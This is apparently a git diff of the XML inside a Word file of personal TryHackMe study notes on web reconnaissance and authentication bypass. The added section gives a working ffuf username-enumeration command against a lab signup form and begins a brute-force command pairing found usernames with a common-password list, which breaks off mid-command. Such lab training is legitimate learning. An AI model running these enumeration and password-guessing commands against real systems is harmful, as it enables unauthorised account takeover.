@@ -3500,13 +3659,7 @@
         <w:rPr>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>2-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Content Discovery</w:t>
+        <w:t>2-Content Discovery</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3529,13 +3682,7 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>a-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>What Is Content Discovery?</w:t>
+        <w:t>a-What Is Content Discovery?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3586,13 +3733,7 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>b-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>Manual Discovery - Robots.txt</w:t>
+        <w:t>b-Manual Discovery - Robots.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3653,24 +3794,18 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>c-</w:t>
+        <w:t xml:space="preserve">c-Manual Discovery </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t xml:space="preserve">Manual Discovery </w:t>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
         <w:t xml:space="preserve"> Favicon</w:t>
       </w:r>
     </w:p>
@@ -3698,6 +3833,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05457436" wp14:editId="45A0DC3C">
@@ -3816,7 +3954,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Viewing the page source you'll see line six contains a link to the images/favicon.ico file. </w:t>
+        <w:t xml:space="preserve">Viewing the page </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>source</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> you'll see line six contains a link to the images/favicon.ico file. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3826,6 +3972,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5487DCE2" wp14:editId="4832E790">
             <wp:extent cx="5543550" cy="501650"/>
@@ -4038,15 +4187,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>d-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>Manual Discovery - Sitemap.xml</w:t>
+        <w:t>d-Manual Discovery - Sitemap.xml</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4100,13 +4241,7 @@
         <w:rPr>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>e-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>Manual Discovery - HTTP Headers</w:t>
+        <w:t>e-Manual Discovery - HTTP Headers</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4417,15 +4552,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>f-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>Manual Discovery - Framework Stack</w:t>
+        <w:t>f-Manual Discovery - Framework Stack</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4520,15 +4647,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>g-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>OSINT - Google Hacking / Dorking</w:t>
+        <w:t>g-OSINT - Google Hacking / Dorking</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4745,6 +4864,7 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4752,6 +4872,7 @@
               </w:rPr>
               <w:t>site:tryhackme.com</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4822,6 +4943,7 @@
               </w:rPr>
             </w:pPr>
             <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4830,6 +4952,7 @@
               <w:t>inurl:admin</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4980,6 +5103,7 @@
               </w:rPr>
             </w:pPr>
             <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4988,6 +5112,7 @@
               <w:t>intitle:admin</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5058,15 +5183,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>h-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t xml:space="preserve">OSINT </w:t>
+        <w:t xml:space="preserve">h-OSINT </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5156,15 +5273,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>g-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>OSINT - Wayback Machine</w:t>
+        <w:t>g-OSINT - Wayback Machine</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5237,15 +5346,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t xml:space="preserve">OSINT </w:t>
+        <w:t xml:space="preserve">-OSINT </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5315,15 +5416,7 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:t xml:space="preserve">j-OSINT </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="magenta"/>
-        </w:rPr>
-        <w:t>S3 Buckets</w:t>
+        <w:t>j-OSINT S3 Buckets</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6542,12 +6635,21 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>./sublist3r.py -d </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>./</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sublist3r.py -d </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7033,14 +7135,35 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>4-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
+          <w:color w:val="F9F9FB"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:highlight w:val="green"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>Authentication Bypass</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7050,14 +7173,58 @@
           <w:highlight w:val="magenta"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>https://iritt.medium.com/tryhackme-authentication-bypass-walkthrough-83e8cd6559f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
+        <w:t>a-Brief</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>n this room, we will learn about different ways website authentication methods can be bypassed, defeated or broken. These vulnerabilities can be some of the most critical as it often ends in leaks of customers personal data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7065,31 +7232,7423 @@
           <w:bCs/>
           <w:highlight w:val="magenta"/>
         </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
+        <w:t>b-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Username Enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>A helpful exercise to complete when trying to find authentication vulnerabilities is creating a list of valid usernames, which we'll use later in other tasks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Website error messages are great resources for collating this information to build our list of valid usernames. We have a form to create a new user account if we go to the Acme IT Support website (</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId51" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>http://MACHINE_IP/customers/signup</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>) signup page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>If you try entering the username admin and fill in the other form fields with fake information, you'll see we get the error </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>An</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> account with this username already exists. We can use the existence of this error message to produce a list of valid usernames already signed up on the system by using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tool below. The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tool uses a list of commonly used usernames to check against for any matches.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">Username enumeration with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/share/wordlists/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SecLists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/Usernames/Names/names.txt -X POST -d "username=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FUZZ&amp;email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>x&amp;password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>x&amp;cpassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=x" -H "Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" -u http://MACHINE_IP/customers/signup -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>mr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "username already exists"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">In the above example, the -w argument selects the file's location on the computer that contains the list of usernames that we're going to check exists. The -X argument specifies the request method, this will be a GET request by default, but it is a POST request in our example. The -d argument specifies the data that we are going to send. In our example, we have the fields username, email, password and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cpassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. We've set the value of the username to FUZZ. In the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tool, the FUZZ keyword signifies where the contents from our wordlist will be inserted in the request. The -H argument is used for adding additional headers to the request. In this instance, we're setting the Content-Type so the web server knows we are sending form data. The -u argument specifies the URL we are making the request to, and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>finally, the -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>mr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> argument is the text on the page we are looking for to validate we've found a valid username.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tool and wordlist come pre-installed on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>AttackBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> or can be installed locally by downloading it from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId52" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://github.com/ffuf/ffuf</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Create a file called valid_usernames.txt and add the usernames that you found using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>; these will be used in Task 3.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>c-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Brute Force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Using the valid_usernames.txt file we generated in the previous </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>task,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we can now use this to attempt a brute force attack on the login page (</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId53" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>http://10.10.238.42/customers/login</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: If you created your </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>valid_usernames</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file by piping the output from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> directly you may have difficulty with this task. Clean your data, or copy just the names into a new file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>When running this command, make sure the terminal is in the same directory as the valid_usernames.txt file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Bruteforcing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
